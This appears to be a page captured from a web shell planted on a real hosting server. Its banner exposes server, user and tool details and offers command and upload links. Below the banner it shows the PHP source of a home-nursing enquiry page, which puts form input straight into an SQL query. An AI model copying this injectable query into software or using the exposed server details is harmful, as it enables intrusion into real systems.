Server IP : 103.53.40.154 / Your IP : 3.144.31.86 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/joshidiagnosticcentre.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php if(isset($_POST['submit'])) { include('admin/config.php'); $name = $_POST['name']; $phone = $_POST['phone']; $service = $_POST['service']; $sql= " INSERT INTO `consultant_page`(`name`, `phone`, `service`) VALUES ('$name','$phone','$service')"; // echo "<br> <h1>No image</h1>"; $result = mysqli_query($conn, $sql) or die("Query unsuccessful"); // echo "<br> <h1>No image</h1>"; if($result){ echo ("<script> window.alert('Succesfully Send'); window.location.href='nursing.php'; </script>"); mysqli_close($conn); }else{ // echo "Not Sybmitted"; } } ?> <!doctype html> <html class="" lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-token" content="WUr7YPVoFe0ZL5l6zQ5288VBVkEZefds8imN3kOa"> <title>Nurse at home | Nursing Services at Home - Nursing CareO</title> </head> <body class=""> <!-- header --> <?php include "oth-header.php";?> <section class="bg-cover py-3 py-md-4 py-lg-5" style="background-image: url('images/banner-nursinged28.webp')"> <div class="container"> <div class="row"> <div class="col-lg-6 col-xl-7 d-flex"> <div class="w-100 my-auto"> <h1 class="font-alt text-center text-lg-left display-4 mb-3 mb-lg-5"> <span class="bg-primary text-white px-3">Nursing services at Home</span> <br> </h1> <div class="bg-black-50 text-white rounded-lg p-4 mb-3 mb-lg-5"> <h2 class="text-uppercase"><strong>We commit to care</strong></h2> <p class="lead">Giving committed nursing care to post-careful, injury dressing, palliative consideration, stoma care and significantly more all over India.</p> <p class="lead mb-0">For more information, get a callback and discuss your requirement.</p> </div> <div class="btn-toolbar"> <a onclick="gtag_report_conversion();" class="btn btn-secondary btn-lg text-uppercase px-5 py-3" href="tel:7718379866">Call Us</a> <a class="btn btn-light btn-lg text-uppercase ml-2 px-5 py-3" href="contact-us.php" type="button">Enquire</a> </div> </div> </div> </div> </div> </section> <section class="py-3 py-md-4 py-lg-5"> <div class="container"> <div class="row"> <div class=" col-lg-6 "> <div class="card shadow mb-3 mb-lg-0"> <div class="card-body"> <p class="card-title h5"> <a class="text-secondary">Get in touch with our expert</a> </p> <p class="card-text mb-3 mb-md-4 mb-lg-5"> Get a callback from our executive to talk further about your requirements. </p> <form action="<?php $_PHP_SELF?>" method="post"> <input type="hidden" name="service" value="Nursing"> <div class="form-group"> <label for="requirement-name">Name <span class="text-danger">*</span></label> <input class="form-control form-control-lg " id="requirement-name" name="name" required> </div> <div class="form-group"> <label for="requirement-phone">Phone number <span class="text-danger">*</span></label> <input class="form-control form-control-lg " id="requirement-phone" name="phone" required type="tel" > </div> <input name="service" type="hidden" value="Nursing"> <button class="btn btn-secondary btn-lg" name="submit">Submit<i class="fas fa-arrow-right ml-1"></i> </button> </form> </div> </div> </div> <div class="col-lg-6"> <div class="mb-3"> <div class="card bg-primary text-white"> <div class="card-body"> <p class="card-title text-uppercase h5"><strong>Expertise Nursing Care</strong></p> <p class="card-text">A bond of healthy and happy caregivers with patients can speed up the recovery.</p> <ul class="fa-ul"> <li><span class="fa-li"><i class="fas fa-prescription"></i></span> Highly qualified and experienced.</li> <li><span class="fa-li"><i class="fas fa-prescription"></i></span> 24*7 nursing expert supervision.</li> <li><span class="fa-li"><i class="fas fa-prescription"></i></span> Proper medical attention.</li> </ul> <a class="btn btn-dark btn-lg" href="tel: 8016042888">Submit a Requirement <i class="fas fa-arrow-right ml-1"></i></a> </div> </div> </div> <div class="card bg-dark text-white"> <div class="card-body"> <p class="card-title text-uppercase h5"><strong>Emergency situation assistance</strong></p> <p class="card-text">Healing might be a matter of time, but it is also about being there at the right time.</p> <ul class="fa-ul"> <li><span class="fa-li"><i class="fas fa-prescription"></i></span> Wound and dressing management.</li> <li><span class="fa-li"><i class="fas fa-prescription"></i></span> Feeding through Ryle’s tube.</li> <li><span class="fa-li"><i class="fas fa-prescription"></i></span> IV and IM injections. </li> <li><span class="fa-li"><i class="fas fa-prescription"></i></span> Catheter and tracheostomy.</li> </ul> <a class="btn btn-primary btn-lg" href="tel: 7718379866"> Contact us <i class="fas fa-arrow-right ml-1"></i> </a> </div> </div> </div> </div> </div> </section> <section class="bg-light py-3 py-md-4 py-lg-5"> <div class="container"> <h2 class="text-center"> <a class="text-primary">Expert Care That You Need</a> </h2> <p class="text-center mb-3 mb-lg-5">The need for nursing care services is unconditional and comes without a knock or warning.</p> <div class="row"> <div class="col-sm-6 col-lg-3"> <div class="mb-3 mb-lg-0"> <div class="card my-card"> <div class="card-body text-center"> <p class="card-text"> <img alt="Medical Management" src="images/nurse-medical-management-icon96be.webp"> </p> <h3 class="card-title"><a class="text-secondary">Medical Management</a></h3> <p class="card-text">Trained to administer injections, Ryle’s tube feeding, tracheostomy management, and much more.</p> </div> </div> </div> </div> <div class="col-sm-6 col-lg-3"> <div class="mb-3 mb-lg-0"> <div class="card my-card"> <div class="card-body text-center"> <p class="card-text"> <img alt="Nutrition & Diet Care" src="images/nurse-diet-care-iconcbda.webp"></p> <h3 class="card-title"><a class="text-secondary">Nutrition & Diet Care</a></h3> <p class="card-text">Food is essential for faster recovery and better overall health. </p> </div> </div> </div> </div> <div class="col-sm-6 col-lg-3"> <div class="mb-3 mb-sm-0"> <div class="card my-card"> <div class="card-body text-center"> <p class="card-text"> <img alt="Mobility & Assistance" src="images/nurse-mobility-iconbc34.webp"></p> <h3 class="card-title"><a class="text-secondary">Mobility & Assistance</a></h3> <p class="card-text">Encourage physical activity under the guidance of physiotherapist. </p> </div> </div> </div> </div> <div class="col-sm-6 col-lg-3"> <div class="card my-card"> <div class="card-body text-center"> <p class="card-text"> <img alt="Vital Monitoring" src="images/nurse-vital-monitoring-iconfeaa.webp"></p> <h3 class="card-title"><a class="text-secondary">Vital Monitoring</a></h3> <p class="card-text">Track necessary vitals such as weight, sugar level, blood pressure, body temperature, etc.</p> </div> </div> </div> </div> </div> </section> <section class="bg-light py-3 py-md-4 py-lg-5"> <div class="container"> <div class="row"> <div class="col-lg-6"> <div class="mb-3 mb-lg-0"> <img alt="Physiotherapy at Home by Nursing Careo" class="img-fluid" src="images/physiotherapy4eec.webp"> </div> </div> <div class="col-lg-6"> <h2 class="mb-3 mb-lg-4 mb-lg-5"> <a class="text-primary">Get Firm Nursing Care at home</a> </h2> <p>These days Nursing Careo is considered one of the main brands in giving quality consideration at home. We give medical attendants who are ANM/GNM/BSC qualified and ICU prepared and are knowledgeable to deal with crisis circumstances. Be it post-careful attention, injury care, inability care, break care, constant ailment or mental hindrance the board. Enlist a Medical caretaker at Home, who will be sufficiently capable to deal with catheterisation and perform suctioning. Dial <a href="tel:8016042888">8016042888</a> to avail the advantages of nursing services at home </p> <div class="btn-toolbar"> <a class="btn btn-primary btn-lg" href="tel:7718379866"> <i class="fas fa-phone-alt mr-1"></i> Call Us </a> </div> </div> </div> </div> </section> <section class="py-3 py-md-4 py-lg-5"> <div class="container"> <p class="text-center h3"> <a class="text-primary">Exceeding expectations</a> </p> <p class="lead text-center mb-3 mb-lg-4 mb-lg-5"> Reviewed for excellence and our commitment towards well-being of patients, our clients love us as much as we love them. </p> <div id="carousel-testimonials" class="carousel slide" data-ride="carousel"> <div class="carousel-inner mb-0"> <div class="carousel-item mb-0 active"> <blockquote class="blockquote bg-light mb-0 p-3 p-md-4 p-xl-5"> <p class="mb-2"> “I have taken services from Nursing Careo. The attendant was hygienic, professional and well groomed. Keep it up Nursing Careo.” </p> <footer class="blockquote-footer text-right"> <strong>Meenakshi Verma</strong> <small>rated</small> <i class="fas fa-star text-warning"></i> <i class="fas fa-star text-warning"></i> <i class="fas fa-star text-warning"></i> <i class="fas fa-star text-warning"></i> <i class="fas fa-star text-warning"></i> </footer> </blockquote> </div> <div class="carousel-item"> <blockquote class="blockquote bg-light mb-0 p-3 p-md-4 p-xl-5"> <p class="mb-2"> “Took the service of elder care for my grandfather. They are truly a well competent attendants, they really cared and served him well.” </p> <footer class="blockquote-footer text-right"> <strong>Azad</strong> <small>rated</small> <i class="fas fa-star text-warning"></i> <i class="fas fa-star text-warning"></i> <i class="fas fa-star text-warning"></i> <i class="fas fa-star text-warning"></i> <i class="fas fa-star text-warning"></i> </footer> </blockquote> </div> </div> </div> </div> </section> <!-- footer --> <?php include "footer.php";?> </body> </html>